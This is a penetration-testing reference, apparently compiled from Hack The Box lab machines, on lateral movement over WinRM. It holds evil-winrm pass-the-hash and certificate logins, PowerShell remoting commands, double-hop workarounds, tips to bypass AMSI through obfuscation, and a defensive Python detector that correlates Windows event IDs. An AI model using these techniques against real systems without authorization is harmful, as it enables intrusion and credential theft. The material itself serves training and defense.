
# WinRM and PowerShell Remoting

## Overview

WinRM (Windows Remote Management) on ports 5985/5986 provides PowerShell-based remote administration. It is one of the cleanest lateral movement methods, offering an interactive shell, file upload/download, and script execution. PowerShell Remoting is built on WinRM and provides Enter-PSSession and Invoke-Command from Windows clients. The primary obstacle is the double-hop problem when authenticating to a third system.

## Prerequisites

  • Valid credentials or NTLM hash with Remote Management Users membership
  • Port 5985 (HTTP) or 5986 (HTTPS) accessible
  • evil-winrm (Linux) or PowerShell (Windows)

## Exploitation / Execution

### 1. evil-winrm with Credentials (Linux)

```bash
evil-winrm -i <IP> -u <user> -p '<password>'
```

### 2. evil-winrm with NTLM Hash (PTH, Linux)

```bash
evil-winrm -i <IP> -u <user> -H <NTLM_hash>
evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
```

### 3. evil-winrm with Certificate (Linux)

```bash
# Extract the certificate and the private key from the PFX
openssl pkcs12 -in user.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in user.pfx -nokeys -out cert.pem

evil-winrm -i <IP> -c cert.pem -k key.pem -S          # -S for SSL (port 5986)
```

### 4. Enter-PSSession (Windows)

```powershell
$secpass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $secpass)

Enter-PSSession -ComputerName <IP> -Credential $cred
```

### 5. Invoke-Command (Windows)

```powershell
# Single command execution
Invoke-Command -ComputerName <IP> -Credential $cred -ScriptBlock { whoami }

# Execute script against multiple targets
Invoke-Command -ComputerName (Get-Content targets.txt) -Credential $cred -ScriptBlock { hostname; whoami }

# Load script from file
Invoke-Command -ComputerName <IP> -Credential $cred -FilePath C:\scripts\enum.ps1
```

### 6. File Transfer within Session

```bash
# evil-winrm built-in commands, typed inside the evil-winrm shell
upload /path/to/local.exe                            # Upload to target
download C:\Users\<user>\Desktop\file.txt            # Download from target
```

```powershell
# PowerShell (Windows): Copy-Item needs an established PSSession object
$session = New-PSSession -ComputerName <IP> -Credential $cred
Copy-Item -FromSession $session C:\remote\file.txt -Destination C:\local\    # Download from target
Copy-Item -ToSession $session C:\local\tool.exe -Destination C:\remote\      # Upload to target
```

### 7. SSL WinRM (Port 5986)

```powershell
# Skip CA and CN validation when the target presents a self-signed certificate
$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck
Enter-PSSession -ComputerName <IP> -Credential $cred -SessionOption $sessionOption -UseSSL
```

## The Double-Hop Problem

### Problem

When connecting from Host A to Host B via WinRM and then trying to reach Host C from Host B, credentials are not forwarded: Host B received a network logon without the user's credentials, so it cannot authenticate to Host C on the user's behalf. The result is an "Access Denied" error:

```powershell
# From Host A, Enter-PSSession to Host B
Enter-PSSession -ComputerName HostB
[HostB]: PS> dir \\HostC\C$                    # FAILS - Access Denied
```

### Solution 1: CredSSP (Windows)

CredSSP enables credential delegation, but it has security implications: the client's full credentials are delegated to Host B, where they can be recovered from memory if that host is compromised.

```powershell
# On source (Host A)
Enable-WSManCredSSP -Role Client -DelegateComputer <HostB>
# On target (Host B)
Enable-WSManCredSSP -Role Server

Enter-PSSession -ComputerName HostB -Credential $cred -Authentication CredSSP
```

### Solution 2: Explicit Credentials Within Session

Build a second credential object inside the session on Host B and pass it explicitly for the hop to Host C:

```powershell
[HostB]: PS> $cred2 = Get-Credential
[HostB]: PS> Invoke-Command -ComputerName HostC -Credential $cred2 -ScriptBlock { dir C:\ }
```

### Solution 3: Pass-the-Hash / Ticket

Use PTH or PTT for the second hop, avoiding credential forwarding entirely.

### Solution 4: Register-PSSessionConfiguration

Create a session configuration on Host B that runs under stored credentials, then connect to that endpoint from Host A:

```powershell
# On Host B: register an endpoint that runs as the stored credential
Register-PSSessionConfiguration -Name AdminSession -RunAsCredential $cred
# From Host A: connect to that endpoint
Enter-PSSession -ComputerName HostB -ConfigurationName AdminSession
```

## Common Pitfalls

  • ⚠️ Remote Management Users group membership required -> verify with net user <username>
  • ⚠️ Double-hop -> always test multi-hop scenarios during engagement planning
  • ⚠️ PowerShell execution policy -> may need bypass: powershell -ExecutionPolicy Bypass
  • ⚠️ AMSI (AntiMalware Scan Interface) -> may block malicious PowerShell scripts; use obfuscation

## OPSEC Considerations

  • 🛡️ WinRM connections generate Event ID 4624 (Logon Type 3) with Authentication Package "Negotiate"
  • 🛡️ PowerShell script block logging (Event ID 4104) records all script content passed via Invoke-Command
  • 🛡️ PowerShell module logging (Event ID 4103) captures pipeline execution details
  • 🛡️ evil-winrm creates wsmprovhost.exe processes, which may be monitored by EDR
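The artifacts listed above correlated in an added Python example that is not part of this page or of evil-winrm: it pairs a type-3 "Negotiate" logon (4624) with a wsmprovhost.exe start (4688) for the same account, then attaches the script blocks (4104) logged for that account. The event records are constructed; field names follow the Security and PowerShell/Operational schemas, but the user fields are assumed to be already normalised to account names, and the 30-second pairing window is an assumption.

```python
"""Toy WinRM session detection over constructed Windows event records."""
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=30)  # assumption: max gap between logon and wsmprovhost start

# Constructed sample events (not real log data); "t" is an ISO-8601 timestamp.
EVENTS = [
    {"t": "2024-01-01T10:00:00", "id": 4624, "LogonType": 3, "AuthenticationPackageName": "Negotiate",
     "TargetUserName": "svc_backup", "IpAddress": "10.10.14.5"},
    {"t": "2024-01-01T10:00:01", "id": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
    {"t": "2024-01-01T10:00:05", "id": 4104, "UserId": "svc_backup", "ScriptBlockText": "whoami; hostname"},
    {"t": "2024-01-01T11:00:00", "id": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "jdoe", "IpAddress": "10.10.14.9"},   # other network logon, no wsmprovhost
    {"t": "2024-01-01T12:00:00", "id": 4688, "SubjectUserName": "admin",
     "NewProcessName": r"C:\Windows\System32\notepad.exe"},
]

def _ts(e):
    return datetime.fromisoformat(e["t"])

def _user(e):
    # user field differs per event type; assumed normalised to a plain account name
    return e.get("TargetUserName") or e.get("SubjectUserName") or e.get("UserId")

def find_winrm_sessions(events):
    """Return one finding per network logon (4624, type 3, Negotiate) that is followed
    within WINDOW by a wsmprovhost.exe start (4688) for the same account; each finding
    carries the 4104 script blocks logged for that account after the logon."""
    events = sorted(events, key=_ts)
    findings = []
    for logon in events:
        if not (logon["id"] == 4624 and logon.get("LogonType") == 3
                and logon.get("AuthenticationPackageName") == "Negotiate"):
            continue
        user, start = _user(logon), _ts(logon)
        host_proc = next((e for e in events if e["id"] == 4688 and _user(e) == user
                          and e["NewProcessName"].lower().endswith("wsmprovhost.exe")
                          and start <= _ts(e) <= start + WINDOW), None)
        if host_proc is None:
            continue
        scripts = [e["ScriptBlockText"] for e in events
                   if e["id"] == 4104 and _user(e) == user and _ts(e) >= start]
        findings.append({"user": user, "source_ip": logon.get("IpAddress"),
                         "logon_time": logon["t"], "script_blocks": scripts})
    return findings

if __name__ == "__main__":
    for f in find_winrm_sessions(EVENTS):
        print(f"WinRM session: {f['user']} from {f['source_ip']} at {f['logon_time']}; "
              f"{len(f['script_blocks'])} script block(s) logged")
```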

## Post-Exploitation Value

  • Full PowerShell access with all .NET framework capabilities
  • File upload/download for tool transfer and data exfiltration
  • Script execution across multiple targets from a single session
  • Credential harvesting via PowerShell cmdlets (Get-ADUser, etc.)

## Cross-References

### Tool References

| Tool | Link |
|---|---|
| evil-winrm | https://github.com/Hackplayers/evil-winrm |
| PowerShell documentation | https://docs.microsoft.com/en-us/powershell/ |

### Source Machines

  • Blackfield (Hard, AD) - WinRM access for svc_backup with SeBackup privilege
  • Cascade (Medium, AD) - WinRM login via s.smith, ArkSvc, and Administrator
  • Escape (Medium, AD) - WinRM for sql_svc and Administrator PTH
  • Forest (Easy, AD) - WinRM for svc-alfresco
  • Return (Easy, AD) - WinRM for svc-printer
  • Sauna (Easy, AD) - WinRM for fsmith and svc_loanmgr
  • Timelapse (Easy, AD) - WinRM via certificate for legacyy and svc_deploy